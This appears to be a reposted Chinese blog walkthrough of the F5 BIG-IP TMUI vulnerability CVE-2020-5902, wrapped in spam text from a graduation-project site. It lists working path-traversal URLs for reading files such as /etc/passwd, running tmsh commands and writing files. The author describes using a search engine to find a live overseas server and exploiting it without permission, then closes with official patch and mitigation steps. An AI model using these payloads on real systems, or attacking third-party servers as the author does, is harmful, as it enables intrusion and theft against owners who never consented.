zw1sh资料

本文主要介绍zw1sh资料 方法和在新技术下所面对的“挑战”,方便大家深入理解zw1sh资料 过程。本文也将分享zw1sh资料 所遇到的问题和应对策略,怎么解决怎么做的问题。
通过深入本文可以理解代码原理,进行代码文档的下载,也可以查看相应 Demo 部署效果。

这几天通报了f5的一个漏洞,想着先弄个环境保存着,说不定后面就用到了。。

1、漏洞描述

​ 近日,F5官方发布公告,修复了流量管理用户界面(TMUI)中存在的一个远程代码执行漏洞(CVE-2020-5902)。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。该漏洞可能对整个系统造成危害。目前监测到网络上已经有PoC,并且已有利用该漏洞的攻击行为出现,建议用户尽快升级进行防护。

​ F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。

​ 参考链接:https://support.f5.com/csp/article/K52145254

2、受影响的版本

F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0

F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2

F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3

F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5

F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5

3、漏洞POC

网上流传的几条(本小白只会”捡现成“的QAQ):

文件读取: https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license  https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf  RCE: https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin  写入文件: https://IP/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=123456 

4、复现

因为才公布出来几天,所以网上还可以搜到许多漏洞版本的网站(其实感觉大多数site后面也不会修补。),这里实在忍不住,就想直接用国外的站点尝试一下(毕竟自己搭环境还是挺麻烦的。。)

用fofa搜一下漏洞版本:

zw1sh

找到一个漂亮国的能正常访问。测试一下下,发现能成功。

zw1sh

zw1sh

写入文件:

zw1sh

这里尝试RCE列出用户,没有输出

获取shell网上也有文章写到了,因为是真实网站,就不继续尝试了。:https://github.com/jas502n/CVE-2020-5902

自己搭个环境试试,版本为14.1.2,因为现在官网好像已经下不到漏洞版本了,网上随便找了个别人下载的,但发现web页面的账号密码好像被他改了(默认是admin/admin),不过不影响,也可以直接利用:

zw1sh

zw1sh

尝试下msf,msf其实已经集成了该exp,但是需要是最新的版本,这里我刚开始使用的手动添加模块,出现了一个报错(另写一篇文章总结),最后解决了,新版本msf里就有该exp

zw1sh

这里没有成功。。后面再尝试下(网上的文章全都一样,只写到了有这个模块,没有人说成功用exp拿到了shell。)

5、官方修复建议

通用修补建议: 升级到以下版本  BIG-IP 15.x: 15.1.0.4 BIG-IP 14.x: 14.1.2.6 BIG-IP 13.x: 13.1.3.4 BIG-IP 12.x: 12.1.5.2 BIG-IP 11.x: 11.6.5.2 临时修补建议: 官方建议可以通过以下步骤临时缓解影响  1) 使用以下命令登录对应系统  tmsh 2) 编辑 httpd 组件的配置文件  edit /sys httpd all-properties 3) 文件内容如下  include ' <LocationMatch "...;."> Redirect 404 / </LocationMatch> ' 4) 按照如下操作保存文件  按下 ESC 并依次输入 :wq 5) 执行命令刷新配置文件  save /sys config 6) 重启 httpd 服务  restart sys service httpd 并禁止外部IP对 TMUI 页面的访问   

zw1sh资料部分资料来自网络,侵权毕设源码联系删除

区块链毕设网(www.qklbishe.com)全网最靠谱的原创区块链毕设代做网站
部分资料来自网络,侵权联系删除!
资源收费仅为搬运整理打赏费用,用户自愿支付 !
qklbishe.com区块链毕设代做网专注|以太坊fabric-计算机|java|毕业设计|代做平台 » zw1sh资料

提供最优质的资源集合

立即查看 了解详情